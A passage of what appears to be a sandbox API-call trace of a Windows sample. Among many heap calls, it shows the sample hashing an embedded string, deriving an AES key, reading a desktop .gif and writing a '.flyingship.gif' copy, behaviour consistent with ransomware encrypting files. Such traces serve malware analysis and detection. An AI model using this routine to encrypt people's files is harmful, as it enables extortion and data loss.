HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0166.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0166.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0166.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0166.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0166.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.827] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0166.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0166.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.828] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.828] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0166.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.828] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.828] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0166.829] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.829] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0166.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.829] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0166.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.829] CryptDestroyHash (hHash=0x90af58) returned 1 [0166.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.829] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r4ko9w2zwntiqwljh0er.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0166.831] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.831] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0166.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r4ko9w2zwntiqwljh0er.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0166.834] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.834] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.834] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.834] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.834] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0166.854] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0166.857] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x565f, lpOverlapped=0x0) returned 1 [0166.857] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0166.858] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.858] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.858] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.859] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0166.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.860] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0166.860] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0166.860] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0166.860] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0166.860] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0166.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.860] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0166.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.861] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0166.861] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.861] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0166.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0166.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0166.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0166.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0166.862] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0166.862] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0166.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.863] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0166.863] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.863] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 